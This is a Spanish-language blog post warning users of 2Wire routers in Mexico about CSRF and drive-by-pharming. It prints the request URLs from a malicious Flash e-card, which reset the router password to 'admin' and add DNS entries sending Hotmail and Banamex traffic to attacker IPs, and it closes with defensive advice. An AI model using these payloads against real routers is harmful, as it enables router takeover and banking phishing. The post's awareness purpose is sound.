Esta es una situacion preocupante para los usuarios "PRODIGY INFINITUM" asi como los cuentan con el tipo de router ya mencionado, hace algunos meses en UNAM-CERT con sede en México se detectaron vulnerabilidades en los routers 2WIRE, estos permiten ejecucion de codigo de manera remota permitiendo ataques web tipo phishing/pharming, enfocados a engañar a los usuarios víctimas para redirigirlos a sitios falsos.Las vulnerabilidades en los equipos 2Wire fueron publicadas en Agosto de 2007, sin embargo a la fecha no existe una actualización de firmware que mitigue el problema.
Las técnicas utilizadas en los ataques son:
Cross-site request forgery (XSRF):Se trata de una técnica intrusiva que se basa en la inclusión de un script malicioso en alguna página web, archivo flash o correo; la víctima, con el simple hecho de navegar por la página con el código insertado estaría realizando sin su conocimiento, actividades escondidas previamente establecidas por el atacante (por ejemplo, modificar una configuración de un router a través de la interfase web sin que el antivurus,spyware y otra aplicacion de seguridad detecte la actividad) .
Drive-by-pharming: Esta técnica consiste en la modificación de los registros para resolución de nombres (DNS) y busca redirigir las peticiones de conexión de un usuario hacia un sistema comprometido por un atacante. Una modalidad consiste en modificar el archivo “hosts” de los equipos de las víctimas, pero una variante más difícil de detectar consiste en alterar los registros de resolución de nombres de los ruteadores caseros de banda ancha (DSL). Este ataque realizado usualmente con tecnologías como javascript y flash intenta identificar la marca y dirección del ruteador casero para poder comprometerlo exitosamente.
En México recientemente se han comenzado a detectar vectores de infección que utilizan las dos técnicas, es decir, se inserta código FLASH en páginas web que al ser navegadas por la víctima insertan registros de DNS en el ruteador casero para redirigir al usuario hacia un sitio falso de banca electrónica u otra pagina que requiera autentificacion de usuarios ej. (BANAMEX.COM,HOTMAIL.COM,etc).
Formas de Ataque
Hace algunos dias recibi una postal que contenia codigo malicioso muy parecido al de UNAM-CERT.
Del archivo swf se obtienen las siguientes cadenas donde en pocas palabras el codigo sobreescribe la contraseña existente por "admin" , con la cual el intruso tiene acceso total a la configuracion del router.
http://home/xsltPAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://gateway.2wire.net/xsltPAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://192.168.1.254/xsltPAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://192.168.0.1/xsltPAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://172.16.0.1/xsltPAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
Las siguientes lineas agregan registros de resolución de nombres (DNS) que seran utilizados para hacer efectivo el ataque , cuando ya tenemos estas lineas ejecutadas y tecleamos en el explorador de internet las direcciones (hotmail.com,banamex.com) el ataque phishing se ejecutara sin ningun problema.
http://home/xsltPAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=hotmail.com&ADDR=67.212.165.12
http://gateway.2wire.net/xsltPAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=65.111.185.95
http://192.168.1.254/xsltPAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=65.111.185.95
En la siguiente imagen se verifica en el router comprometido que han sido agregados registros sin conocimiento del usuario:
Vias de Infeccion
- HTML plano (blogger, websites estáticos, etc.)
- Javascript (páginas web con scripts)
- Animaciones FLASH (taarjetas de felicitación, presentaciones, etc.)
verifica si tu router es vulnerable http://bug2wire.blogspot.com/
Reomendaciones
- Verificar constantemente la configuracion del router en especial los registros de resolución de nombres (DNS) .
- Evitar abrir correos desconocidos asi como borrarlos por completo.
- Asegúrese de que el sitio Web utiliza cifrado.
- Comunique los posibles delitos relacionados con su información personal a las autoridades competentes.
- Descargen la toolbar Anti-phishing NetCraft nos muestra los proveedores de hosting de los sitios a los que accesamos.
No hay comentarios:
Publicar un comentario